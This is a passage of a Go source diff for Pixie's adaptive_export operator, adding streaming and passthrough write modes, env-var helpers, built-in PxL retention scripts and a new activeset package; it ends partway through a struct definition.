mode := cfg.Worker().ExportMode() + // Per-pull write-fidelity instrument (ADAPTIVE_RECONCILE). When on, + // the CH-backed sink IS the Recorder; otherwise a Nop drops every row. + // Shared by the controller fan-out, passthrough, and streaming paths. + var rec reconcile.Recorder = reconcile.Nop{} + if strings.EqualFold(os.Getenv(envReconcile), "true") { + rec = snk + log.Info("ADAPTIVE_RECONCILE=true — per-pull read/wrote counts → forensic_db.ae_reconcile") + } - ticker := time.NewTicker(detectionInterval) - defer ticker.Stop() + // Mode selection: + // "streaming" → rev-3: leave PushPixieTables EMPTY (so the + // controller skips fan-out) and stand up the + // streaming.Supervisor instead. + // else → rev-2: per-hash×per-table fan-out (legacy). + streamingMode := strings.EqualFold(os.Getenv(envAdaptiveWriteMode), "streaming") + pushPixieRequested := strings.EqualFold(os.Getenv(envPushPixieTables), "true") + if streamingMode && pushPixieRequested { + log.Info("ADAPTIVE_WRITE_MODE=streaming overrides ADAPTIVE_PUSH_PIXIE_ROWS — fan-out disabled, streaming.Supervisor will own protocol-table writes") + } - // pluginEnabled tracks our last-known retention-plugin state. A nil value means - // we haven't reconciled yet; we always query on the first tick. - var pluginEnabled *bool - quietStreak := int64(0) + // Shared ActiveSet (used only by streaming mode; harmless in pull mode). + activeSet := activeset.New() + // AttributionNotifier — non-blocking shim so the controller's + // synchronous OnAttribution / OnPrune callbacks don't pin + // controller.handle on slow ActiveSet writes. Tests in + // streaming/notifier_test.go cover the buffer-overflow + drop + // semantics. The Run goroutine is started below in streaming mode. 
+ attrNotifier := streaming.NewAttributionNotifier(activeSet, streaming.NotifierConfig{ + BufferSize: intEnvOrZero("ADAPTIVE_STREAM_NOTIFIER_BUFFER"), + }) - reconcile := func(want bool) { - if pluginEnabled != nil && *pluginEnabled == want { - log.Debugf("export already in desired state (enabled=%v), no action taken", want) - return + ctlCfg := controller.Config{ + Hostname: hostname, + Rec: rec, + Before: durEnv(envWindowBeforeSec, 5*time.Minute, time.Second), + After: durEnv(envWindowAfterSec, 5*time.Minute, time.Second), + MaxParallelQueriesPerHash: intEnvOrZero(envMaxParallelQueriesPerHash), + MaxInflightQueriesGlobal: intEnvOrZero(envMaxInflightQueriesGlobal), + EmptyResultSkipAfterN: intEnvOrZero(envEmptyResultSkipAfterN), + EmptyResultSkipTTL: durEnvOrZero(envEmptyResultSkipTTLSec, time.Second), + } + if streamingMode { + // Route through the non-blocking notifier — handle() returns + // in <1µs even if ActiveSet writers are slow. Host-pid pods + // (empty Pod) are filtered inside the notifier. + ctlCfg.OnAttribution = attrNotifier.SubmitFromController + ctlCfg.OnPrune = attrNotifier.RemoveFromController + } + if !streamingMode && pushPixieRequested { + // PxL's px.DataFrame(table=…) rejects dotted table names even + // though px.GetSchemas() lists them. Drop them from the push + // list; the cloud-side retention plugin would have to handle + // those if the user wants them. 
+ var tables []string + for _, t := range pxl.Names(pxl.Builtins()) { + if strings.Contains(t, ".") { + log.WithField("table", t).Info("skipping dotted-name table from push list — PxL DataFrame rejects it") + continue + } + tables = append(tables, t) } - pluginCtx, pluginCancel := context.WithTimeout(ctx, 2*time.Minute) - defer pluginCancel() - if want { - log.Info("Enabling forensic export") - if err := enableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to enable forensic export") - return + ctlCfg.PushPixieTables = tables + log.WithField("tables", ctlCfg.PushPixieTables). + Info("ADAPTIVE_PUSH_PIXIE_ROWS=true — operator will query pixie + write rows directly on each anomaly") + } + // Optional single-shot / custom refresh override (default-unchanged when + // unset). Negative → single-shot: exactly one pull per anomaly window. + if v := strings.TrimSpace(os.Getenv(envPushRefreshSec)); v != "" { + if n, err := strconv.Atoi(v); err == nil { + if n < 0 { + ctlCfg.PushRefreshInterval = -1 + log.Info(envPushRefreshSec + "<0 — single-shot pull mode (one pull per anomaly window)") + } else { + ctlCfg.PushRefreshInterval = time.Duration(n) * time.Second } - v := true - pluginEnabled = &v - log.Info("Forensic export enabled successfully") } else { - log.Info("Disabling forensic export") - if err := disableClickHousePlugin(pluginCtx, pluginClient, cfg, clusterID, clusterName); err != nil { - log.WithError(err).Error("failed to disable forensic export") - return - } - v := false - pluginEnabled = &v - quietStreak = 0 - log.Info("Forensic export disabled successfully") + log.WithField("value", v).Warn(envPushRefreshSec + " not an integer; using default refresh") } } - - log.Infof("Detection task starting (mode=%s, quietTicks=%d)", mode, quietTicks) - - for { - select { - case <-ctx.Done(): - log.Info("Detection task shutting down") - return - case <-ticker.C: - switch mode { - case 
config.ExportModeAlways: - reconcile(true) - continue - case config.ExportModeNever: - reconcile(false) - continue + ctl := controller.New(trg, snk, ctlCfg, nil) + + // Build the pixie adapter ONCE — shared by rev-2's pushPixieRows + // path, the rev-3 streaming.Supervisor, AND the firehose passthrough + // loop. All three need a live pxapi client; constructing once avoids + // holding two parallel grpc streams for the same vizier. + passthroughEnabled := strings.EqualFold(os.Getenv(envPassthrough), "true") + var pixieAdapterInst *pixieapi.Adapter + if len(ctlCfg.PushPixieTables) > 0 || streamingMode || passthroughEnabled { + var adapter *pixieapi.Adapter + if direct := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR"); direct != "" { + // Direct mode — bypass the cloud's passthrough proxy and + // connect to the in-cluster vizier-query-broker. Use this + // on self-hosted clouds where pxapi.WithAPIKey isn't + // authorized for the cluster (e.g. a freshly-deployed + // vizier whose ID isn't yet linked to the API key's owner). + a, err := pixieapi.NewDirectFromEnv(cfg.Pixie().ClusterID()) + if err != nil { + log.WithError(err).Fatal("ADAPTIVE_VIZIER_DIRECT_ADDR set but direct-mode adapter init failed") } - - // auto mode: detection drives the state. 
- log.Debug("Running detection script") - execCtx, cancel := context.WithTimeout(ctx, scriptExecutionTimeout) - recordCount, err := pxl.ExecuteScript(execCtx, pxClient, clusterID, renderDetectionScript(cfg.ClickHouse(), detectionLookback)) - cancel() + log.WithField("addr", direct).Info("pixieapi: direct mode (bypassing cloud proxy)") + adapter = a + } else { + pxClient, err := pxapi.NewClient(ctx, + pxapi.WithAPIKey(cfg.Pixie().APIKey()), + pxapi.WithCloudAddr(cfg.Pixie().Host())) if err != nil { - log.WithError(err).Error("failed to execute detection script") - continue + log.WithError(err).Fatal("failed to create pxapi client") } - log.Debugf("Detection script returned %d records", recordCount) + adapter = pixieapi.New(pxClient, cfg.Pixie().ClusterID()) + } + pixieAdapterInst = adapter + if len(ctlCfg.PushPixieTables) > 0 { + ctl = ctl.WithPixieQuerier(&pixieAdapter{a: adapter}) + } + } - if recordCount > 0 { - quietStreak = 0 - reconcile(true) - } else { - quietStreak++ - if quietStreak >= quietTicks { - reconcile(false) + // 5. Rehydrate active state across crashes. + if err := ctl.Rehydrate(ctx); err != nil { + log.WithError(err).Warn("could not rehydrate active set; starting cold") + } else { + log.WithField("active", ctl.Active()).Info("active set rehydrated") + } + + // 6. Periodic prune of in-memory expired entries + main controller loop. + // Both goroutines are tracked in a WaitGroup so SIGTERM cleanly waits + // for in-flight HTTP calls (trigger 5s timeout, sink 30s timeout) + // instead of being cut off by an arbitrary 500ms sleep. + pruneInterval := durEnv(envPruneIntervalSec, 30*time.Second, time.Second) + var wg sync.WaitGroup + wg.Add(1) + go func() { + defer wg.Done() + t := time.NewTicker(pruneInterval) + defer t.Stop() + for { + select { + case <-ctx.Done(): + return + case <-t.C: + if removed := ctl.PruneExpired(); removed > 0 { + log.WithField("removed", removed).Debug("pruned expired active entries") } } } + }() + + // 7. Run the controller. 
+ wg.Add(1) + go func() { + defer wg.Done() + if err := ctl.Run(ctx); err != nil && err != context.Canceled { + log.WithError(err).Error("controller exited with error") + } + }() + + // 7b. Streaming mode (rev-3): start the per-table scanners + + // batched writers. Replaces the per-hash×per-table fan-out. + if streamingMode { + // Start the AttributionNotifier consumer so SubmitFromController + // calls actually get delivered to ActiveSet. + wg.Add(1) + go func() { + defer wg.Done() + attrNotifier.Run(ctx) + }() + + // Seed the ActiveSet from the rehydrated controller so existing + // alive attribution rows resume streaming immediately on boot. + // Without this seeding, only fresh kubescape events would + // repopulate the set — losing N minutes of coverage per restart. + seedActiveSetFromRehydrate(ctl, activeSet) + + builtins := pxl.Builtins() + streamTables := make([]string, 0, len(builtins)) + for _, t := range pxl.Names(builtins) { + if strings.Contains(t, ".") { + continue // PxL DataFrame rejects dotted names + } + streamTables = append(streamTables, t) + } + updater := streaming.NewUpdater(activeSet, streaming.UpdaterConfig{ + Debounce: durEnvOrZero("ADAPTIVE_STREAM_DEBOUNCE_SEC", time.Second), + MaxAllowlistSize: intEnvOrZero("ADAPTIVE_STREAM_MAX_ALLOWLIST"), + }) + supervisor := streaming.NewSupervisor( + updater, + &pixieAdapter{a: pixieAdapterInst}, + snk, + streamTables, + streaming.ScannerConfig{ + QueryWindow: durEnvOrZero("ADAPTIVE_STREAM_WINDOW_SEC", time.Second), + RefreshInterval: durEnvOrZero("ADAPTIVE_STREAM_REFRESH_SEC", time.Second), + Rec: rec, + Hostname: hostname, + }, + streaming.WriterConfig{ + BatchRows: intEnvOrZero("ADAPTIVE_STREAM_BATCH_ROWS"), + BatchEvery: durEnvOrZero("ADAPTIVE_STREAM_BATCH_EVERY_SEC", time.Second), + }, + ) + wg.Add(1) + go func() { + defer wg.Done() + supervisor.Run(ctx) + }() + log.WithField("tables", streamTables).Info("rev-3 streaming supervisor started") } -} -func disableClickHousePlugin(ctx 
context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) + // 7c. Firehose passthrough loop — independent of fan-out / streaming. + // Off unless ADAPTIVE_PASSTHROUGH=true. Reuses the same adapter + + // sink so byte-shape of written rows matches the AE-filter phase. + if passthroughEnabled { + if pixieAdapterInst == nil { + log.Fatal("ADAPTIVE_PASSTHROUGH=true but pixie adapter is nil — internal wiring bug") + } + // Compiled path is the default; ADAPTIVE_PASSTHROUGH_COMPILED=false + // reverts to the legacy serial QueryFor loop. + compiled := !strings.EqualFold(os.Getenv(envPassthroughCompiled), "false") + ptCfg := passthrough.Config{ + Window: durEnv(envPassthroughWindow, 30*time.Second, time.Second), + Refresh: durEnv(envPassthroughRefresh, 30*time.Second, time.Second), + Rec: rec, + Hostname: hostname, + Compiled: compiled, + } + ptLoop := passthrough.New(&pixieAdapter{a: pixieAdapterInst}, snk, ptCfg) + wg.Add(1) + go func() { + defer wg.Done() + ptLoop.Run(ctx) + }() + log.WithFields(log.Fields{ + "window": ptCfg.Window, + "refresh": ptCfg.Refresh, + "compiled": ptCfg.Compiled, + }).Info("ADAPTIVE_PASSTHROUGH=true — firehose loop running (no anomaly gate)") } - if !plugin.RetentionEnabled { - log.Info("ClickHouse plugin already disabled; removing any lingering ch-* scripts") - } else { - if err := client.DisableClickHousePlugin(plugin.LatestVersion); err != nil { - return fmt.Errorf("failed to disable ClickHouse plugin: %w", err) + + log.WithFields(log.Fields{ + "hostname": hostname, + "poll_interval": pollInterval, + "prune_interval": pruneInterval, + "window_before": ctlCfg.Before, + "window_after": ctlCfg.After, + }).Info("operator running") + + // control surface: when CONTROL_ADDR is set, the per-node controller + // steers this AE's activeSet (Upsert/Remove) over HTTP. 
Off by default so + // the existing trigger→controller→activeSet flow is unchanged. + if addr := os.Getenv("CONTROL_ADDR"); addr != "" { + ctrlSrv := control.New(activeSet, nil) // OrderQuery runner wired later + ctrlSrv.SetGraphWriter(applier) // dx_attack_graph ingest → ClickHouse + // Bearer-JWT auth on the control surface (CodeRabbit: protect control + // endpoints). Same shared lib + signing key the broker/PEM use — dx + // attaches the service JWT it already mints. Default-OFF so this can + // merge before dx sends the bearer; flip CONTROL_REQUIRE_AUTH=true once + // dx is updated + PL_JWT_SIGNING_KEY is mounted. Safe incremental rollout. + if key := os.Getenv("PL_JWT_SIGNING_KEY"); key != "" && os.Getenv("CONTROL_REQUIRE_AUTH") == "true" { + ctrlSrv.SetAuth(key, "vizier") + log.Info("control surface: bearer-JWT auth ENABLED (audience=vizier)") + } else { + log.Warn("control surface: auth DISABLED (set CONTROL_REQUIRE_AUTH=true + PL_JWT_SIGNING_KEY)") } + // Wrap in an http.Server with explicit timeouts so a slow client + // can't pin a goroutine on the control surface (CodeRabbit + // r3379377432). The control plane is small/idempotent JSON, so + // short read/write budgets are fine. + httpSrv := &http.Server{ + Addr: addr, + Handler: ctrlSrv.Handler(), + ReadHeaderTimeout: 5 * time.Second, + ReadTimeout: 15 * time.Second, + WriteTimeout: 30 * time.Second, + IdleTimeout: 60 * time.Second, + } + go func() { + log.WithField("addr", addr).Info("control surface listening") + if err := httpSrv.ListenAndServe(); err != nil && + err != http.ErrServerClosed { + log.WithError(err).Error("control surface stopped") + } + }() } - // Tear down the per-cluster ch-* retention scripts so the demo can be re-run cleanly. 
- current, err := client.GetClusterScripts(clusterID, clusterName) - if err != nil { - return fmt.Errorf("failed to list retention scripts: %w", err) + sigCh := make(chan os.Signal, 1) + signal.Notify(sigCh, syscall.SIGINT, syscall.SIGTERM) + <-sigCh + log.Info("shutdown signal received; waiting for goroutines to drain") + cancel() + // Bound the wait so a hung HTTP call can't keep the process up forever. + done := make(chan struct{}) + go func() { wg.Wait(); close(done) }() + select { + case <-done: + log.Info("clean shutdown") + case <-time.After(35 * time.Second): + log.Warn("shutdown deadline reached with goroutines still running; exiting") } - var errs []error - for _, s := range current { - log.Infof("Deleting retention script %s", s.Name) - if err := client.DeleteDataRetentionScript(s.ScriptId); err != nil { - errs = append(errs, err) - } +} + +// chHTTPEndpoint resolves the ClickHouse HTTP endpoint. Explicit env +// override wins; otherwise build "http://:8123" from config. +func chHTTPEndpoint(host, override string) string { + if override != "" { + return strings.TrimRight(override, "/") } - if len(errs) > 0 { - return fmt.Errorf("errors while deleting retention scripts: %v", errs) + if host == "" { + host = "localhost" } - return nil + return "http://" + host + ":8123" } -func enableClickHousePlugin(ctx context.Context, client *pixie.Client, cfg config.Config, clusterID string, clusterName string) error { - log.Info("Checking the current ClickHouse plugin configuration") - plugin, err := client.GetClickHousePlugin() - if err != nil { - return fmt.Errorf("getting data retention plugins failed: %w", err) +// resolveHostname picks the node identity for node-local scoping. +// REQUIRES NODE_NAME (set via k8s downward API spec.nodeName). The +// previous os.Hostname() fallback returned the POD hostname, not the +// node — making the operator silently miss its node's rows. 
+func resolveHostname() (string, error) { + if v := strings.TrimSpace(os.Getenv(envNodeName)); v != "" { + return v, nil } + return "", fmt.Errorf("%s env var is required (set via k8s downward API: valueFrom.fieldRef.fieldPath=spec.nodeName)", envNodeName) +} - enablePlugin := true - if plugin.RetentionEnabled { - enablePlugin = false - config, err := client.GetClickHousePluginConfig() - if err != nil { - return fmt.Errorf("getting ClickHouse plugin config failed: %w", err) - } - if config.ExportURL != cfg.ClickHouse().DSN() { - log.Info("ClickHouse plugin is configured with different DSN... Overwriting") - enablePlugin = true - } +// durEnv reads a positive-integer-valued duration env var. unit +// defines the unit (time.Second, time.Millisecond). Returns dflt on +// missing / unparseable / non-positive values — non-positive would +// either panic time.NewTicker or invert the attribution window, so +// we fall back to the default and log loudly. +func durEnv(key string, dflt, unit time.Duration) time.Duration { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.ParseInt(v, 10, 64) + if err != nil { + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid duration env; using default") + return dflt + } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive duration env; using default") + return dflt } + return time.Duration(n) * unit +} - if enablePlugin { - log.Info("Enabling ClickHouse plugin") - err := client.EnableClickHousePlugin(&pixie.ClickHousePluginConfig{ - ExportURL: cfg.ClickHouse().DSN(), - }, plugin.LatestVersion) - if err != nil { - return fmt.Errorf("failed to enable ClickHouse plugin: %w", err) - } +// intEnv reads a positive-integer-valued env var. Returns dflt on +// missing / unparseable / non-positive. Same shape as durEnv but +// without the unit multiplier — for counts (e.g. row limits). 
+func intEnv(key string, dflt int) int { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return dflt + } + n, err := strconv.Atoi(v) + if err != nil { + log.WithError(err).WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid int env; using default") + return dflt } + if n <= 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("non-positive int env; using default") + return dflt + } + return n +} - log.Info("Setting up the data retention scripts") +// intEnvOrZero is like intEnv but treats unset / empty / non-positive +// as 0 (= "feature disabled"). Used for opt-in throttle knobs where 0 +// preserves legacy behavior and a positive integer enables the throttle. +func intEnvOrZero(key string) int { + v := strings.TrimSpace(os.Getenv(key)) + if v == "" { + return 0 + } + n, err := strconv.Atoi(v) + if err != nil || n < 0 { + log.WithFields(log.Fields{"key": key, "value": v}). + Warn("invalid int env; treating as 0 (disabled)") + return 0 + } + return n +} - log.Info("Getting preset script from the Pixie plugin") - defsFromPixie, err := client.GetPresetScripts() - if err != nil { - return fmt.Errorf("failed to get preset scripts: %w", err) +// durEnvOrZero is the duration-typed counterpart. unit lets the caller +// express the env value in seconds / milliseconds without per-knob +// parsing logic. 0 → returned as 0 (= feature disabled). +func durEnvOrZero(key string, unit time.Duration) time.Duration { + n := intEnvOrZero(key) + if n <= 0 { + return 0 } + return time.Duration(n) * unit +} - // Filter presets by an allow-list of case-insensitive substrings in the - // script name. Useful when the destination ClickHouse doesn't have every - // target table pre-created (Pixie's C++ ClickHouseExportSinkNode aborts - // kelvin on UNKNOWN_TABLE from CH — upstream bug), so we must not install - // retention scripts whose target table is missing. 
+// seedActiveSetFromRehydrate reads the operator's rehydrated +// attribution rows back from CH and Upserts them into the streaming +// ActiveSet. Without this, a restart in streaming mode leaves the +// scanners with an empty allowlist until the next kubescape event +// arrives — N minutes of coverage gap per restart. +func seedActiveSetFromRehydrate(ctl *controller.Controller, set *activeset.ActiveSet) { + // The controller's Rehydrate already populated its in-memory + // active map from CH. We re-issue QueryActive here to mirror + // those rows into the ActiveSet — keeping the streaming layer + // fully decoupled from controller internals. // - // Example: ALLOWED_RETENTION_SCRIPTS="conn_stats" installs only the - // conn_stats preset (matches "conn_stats export"), skipping dc_snoop + - // stack_traces which target tables that don't exist in soc's schema.sql. - // - // Empty/unset = no filter (install every preset — the prior behavior). - definitions := defsFromPixie - if allow := strings.TrimSpace(os.Getenv("ALLOWED_RETENTION_SCRIPTS")); allow != "" { - tokens := strings.Split(allow, ",") - filtered := make([]*script.ScriptDefinition, 0, len(defsFromPixie)) - for _, d := range defsFromPixie { - nameLower := strings.ToLower(d.Name) - for _, t := range tokens { - t = strings.ToLower(strings.TrimSpace(t)) - if t != "" && strings.Contains(nameLower, t) { - filtered = append(filtered, d) - break - } - } + // Timeout: defaults to 60s (bumped from a 30s hardcode for + // the rev-2 schema); ADAPTIVE_SCRIPT_TIMEOUT_SECONDS overrides for + // busy clusters where a large rehydrate snapshot won't land in + // the default window. Defensive: the operator could not reproduce + // the original "DeadlineExceeded" symptom on the soak PG, but + // the env knob exists so operators don't have to ship a patch + // to widen it. 
+ scriptTimeout := durEnv("ADAPTIVE_SCRIPT_TIMEOUT_SECONDS", 60*time.Second, time.Second) + ctx, cancel := context.WithTimeout(context.Background(), scriptTimeout) + defer cancel() + rows, err := ctl.SnapshotActive(ctx) + if err != nil { + log.WithError(err).Warn("seed: SnapshotActive failed; streaming starts cold") + return + } + for _, r := range rows { + if r.Pod == "" { + continue } - log.Infof("ALLOWED_RETENTION_SCRIPTS=%q; filtered presets: %d of %d kept", allow, len(filtered), len(defsFromPixie)) - definitions = filtered + set.Upsert(activeset.Key{Namespace: r.Namespace, Pod: r.Pod}, r.TEnd) } + log.WithField("seeded", set.Size()).Info("streaming.ActiveSet seeded from rehydrated rows") +} - log.Infof("Getting current scripts for cluster") - currentScripts, err := client.GetClusterScripts(clusterID, clusterName) +// pixieAdapter wraps pixieapi.Adapter so its return type matches the +// controller's PixieQuerier interface (which uses []map[string]any +// rather than the pixieapi-internal Row alias). 
+type pixieAdapter struct{ a *pixieapi.Adapter } + +func (p *pixieAdapter) Query(ctx context.Context, src string) ([]map[string]any, error) { + rows, err := p.a.Query(ctx, src) if err != nil { - return fmt.Errorf("failed to get data retention scripts: %w", err) + return nil, err } - - actions := script.GetActions(definitions, currentScripts, script.ScriptConfig{ - ClusterName: clusterName, - ClusterId: clusterID, - CollectInterval: cfg.Worker().CollectInterval(), - }) - - var errs []error - - for _, s := range actions.ToDelete { - log.Infof("Deleting script %s", s.Name) - err := client.DeleteDataRetentionScript(s.ScriptId) - if err != nil { - errs = append(errs, err) - } + out := make([]map[string]any, len(rows)) + for i, r := range rows { + out[i] = map[string]any(r) } + return out, nil +} - for _, s := range actions.ToUpdate { - log.Infof("Updating script %s", s.Name) - err := client.UpdateDataRetentionScript(clusterID, s.ScriptId, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) +// installPresetScripts purges any stale ClickHouse-plugin retention +// scripts on the cluster, then installs the operator's built-in PxL +// scripts targeting the 13 socket_tracer tables we DDL'd. Cloud-side +// "presets" are deliberately ignored: in this fork the legacy +// "conn_stats export" / "dc snoop export" / "stack_traces export" +// preset names predate the rev-2 schema and would silently fail to +// write. conn_stats is now in the rev-2 schema, but it +// ships as "ch-conn_stats" (operator-managed naming) — the legacy +// "conn_stats export" preset name is still purged below so a stale +// one doesn't double-write. 
+func installPresetScripts(client *pixie.Client, clusterID, clusterName string) (int, error) { + current, err := client.GetClusterScripts(clusterID, clusterName) + if err != nil { + return 0, fmt.Errorf("get cluster scripts: %w", err) + } + currentNames := make([]string, 0, len(current)) + for _, s := range current { + currentNames = append(currentNames, s.Name) + } + log.WithFields(log.Fields{ + "already_on_cluster": len(current), + "cluster_script_names": currentNames, + }).Info("preset script install — purging managed + installing built-ins") + + // Purge ONLY scripts we recognise as operator-managed or as legacy + // presets we know are broken in the rev-2 schema. User-authored + // retention scripts are left alone. + for _, s := range current { + if !isOperatorManagedScript(s.Name) { + log.WithField("script", s.Name). + Debug("preset install — leaving user-authored script alone") + continue + } + if err := client.DeleteDataRetentionScript(s.ScriptID); err != nil { + log.WithError(err).WithField("script", s.Name).Warn("failed to delete stale script") + continue } + log.WithField("script", s.Name).Info("purged stale retention script") } - for _, s := range actions.ToCreate { - log.Infof("Creating script %s", s.Name) - err := client.AddDataRetentionScript(clusterID, s.Name, s.Description, s.FrequencyS, s.Script) - if err != nil { - errs = append(errs, err) + // Install built-ins. 
+ presets := builtinPresetScripts() + installed := 0 + for _, p := range presets { + if err := client.AddDataRetentionScript(clusterID, p.Name, p.Description, p.FrequencyS, p.Script); err != nil { + log.WithError(err).WithField("script", p.Name).Warn("failed to install built-in script") + continue } + installed++ + log.WithField("script", p.Name).Info("installed retention script") } + return installed, nil +} - if len(errs) > 0 { - return fmt.Errorf("errors while setting up data retention scripts: %v", errs) +// isOperatorManagedScript decides whether a cluster-side retention +// script is safe to delete during INSTALL_PRESET_SCRIPTS. The criteria: +// +// 1. Anything with the "ch-" prefix matches the operator's own +// builtinPresetScripts naming (ch-
) — managed. +// 2. The legacy AOCC presets we explicitly want to retire because +// their target tables don't exist in the rev-2 schema: +// "conn_stats export", "dc snoop export", "stack_traces export". +// +// Any other script is assumed user-authored and left alone. +func isOperatorManagedScript(name string) bool { + if strings.HasPrefix(name, "ch-") { + return true } - - log.Info("All done! The ClickHouse plugin is now configured.") - return nil + switch name { + case "conn_stats export", "dc snoop export", "stack_traces export": + return true + } + return false } -func setupPixie(ctx context.Context, cfg config.Pixie, tries int, sleepTime time.Duration) (*pixie.Client, error) { - apiKey := cfg.APIKey() - host := cfg.Host() - log.Infof("setupPixie: API Key length=%d, Host=%s", len(apiKey), host) - - for tries > 0 { - // Use parent context - client stores this and uses it for all subsequent operations - client, err := pixie.NewClient(ctx, apiKey, host) - if err == nil { - return client, nil - } - tries -= 1 - log.WithError(err).Warning("error creating Pixie API client") - if tries > 0 { - time.Sleep(sleepTime) - } +// builtinPresetScripts returns a minimum set of PxL scripts mirroring +// the canonical Pixie preset shape — one bulk-write script per +// socket_tracer table. Each adds namespace + pod columns and emits to +// the matching CH table via px.display(name='
') which the +// retention plugin maps to forensic_db.
. +// +// Schedule: 10s. Window: -15s (overlap so we don't lose rows during +// schedule jitter). +func builtinPresetScripts() []*script.ScriptDefinition { + // Drop dotted-name tables (http2_messages.beta, kafka_events.beta): + // `px.DataFrame(table='…')` rejects them at PxL compile time, so a + // preset for them would be permanently broken. The cloud-side + // retention plugin would have to handle those if needed. + tables := []string{ + "http_events", "dns_events", "redis_events", "mysql_events", + "pgsql_events", "cql_events", "mongodb_events", "amqp_events", + "mux_events", "tls_events", + // conn_stats — counter snapshots; same shape as + // the protocol-events PxL (DataFrame + namespace/pod cols + + // px.display). Each pull is one snapshot row per (remote tuple, + // protocol); ClickHouse merges by (hostname, event_time). + "conn_stats", + } + out := make([]*script.ScriptDefinition, 0, len(tables)) + for _, t := range tables { + body := "import px\n" + + "df = px.DataFrame(table='" + t + "', start_time='-15s')\n" + + "df.namespace = px.upid_to_namespace(df.upid)\n" + + "df.pod = px.upid_to_pod_name(df.upid)\n" + + "px.display(df, '" + t + "')\n" + out = append(out, &script.ScriptDefinition{ + Name: "ch-" + t, + Description: "adaptive_export builtin preset for " + t, + FrequencyS: 10, + Script: body, + IsPreset: false, + }) } - return nil, fmt.Errorf("exceeded maximum number of retries") + return out } diff --git a/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel new file mode 100644 index 00000000000..9003a0f131d --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/BUILD.bazel @@ -0,0 +1,25 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "activeset", + srcs = ["activeset.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/activeset", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) + +pl_go_test( + name = "activeset_test", + srcs = ["activeset_test.go"], + embed = [":activeset"], +) diff --git a/src/vizier/services/adaptive_export/internal/activeset/activeset.go b/src/vizier/services/adaptive_export/internal/activeset/activeset.go new file mode 100644 index 00000000000..3cbc40ff390 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/activeset/activeset.go @@ -0,0 +1,267 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package activeset owns the "currently being streamed" pod set for +// the rev-3 adaptive-write streaming path. One ActiveSet per +// operator process. +// +// Why it exists: rev-2's pushPixieRows fan-out gated streaming +// per-(hash, table); the fan-out spawned an O(active_hashes × tables) +// concurrency tree that DoS'd vizier-query-broker under load. 
Rev-3 +// inverts the relationship: ONE PxL submission per table per refresh, +// embedding an allowlist drawn from this ActiveSet. The set is keyed +// per-pod, not per-hash, because pixie events have no hash dimension +// — multiple anomaly hashes on the same pod share one stream slot. +// +// Membership is computed from kubescape attribution: a pod is in the +// set iff there is at least one anomaly-attribution row for it whose +// t_end is in the future. +package activeset + +import ( + "sync" + "time" +) + +// Key identifies one pod in the set. "namespace/pod" matches what +// `px.upid_to_pod_name` returns inside PxL, so embedding Keys verbatim +// into a PxL allowlist filter requires no transformation. +type Key struct { + Namespace string + Pod string +} + +// Render returns the "namespace/pod" form used in PxL allowlists. +// Pod-only Keys (empty Namespace) render as bare "pod" — kept for +// host-pid edge cases though those don't currently reach a stream. +func (k Key) Render() string { + if k.Namespace == "" { + return k.Pod + } + return k.Namespace + "/" + k.Pod +} + +// Delta describes a change to the set. Subscribers receive deltas +// to know when to re-evaluate stream submissions. Both slices may +// be non-empty in a single delta when concurrent upserts and prunes +// land in the same delivery window. +type Delta struct { + Added []Key + Removed []Key + Version uint64 // monotonic; matches the post-delta version of the set +} + +// ActiveSet is a goroutine-safe, version-counted pod set with +// fan-out delta delivery. +type ActiveSet struct { + mu sync.Mutex + members map[Key]time.Time // pod → t_end (when the active window expires absent further extension) + version uint64 + + // subs are independent buffered channels — one per subscriber. + // Buffered so a slow consumer can't block an upserter; oldest + // delta is dropped on overflow (subscriber observes a version + // skip and is expected to re-snapshot). 
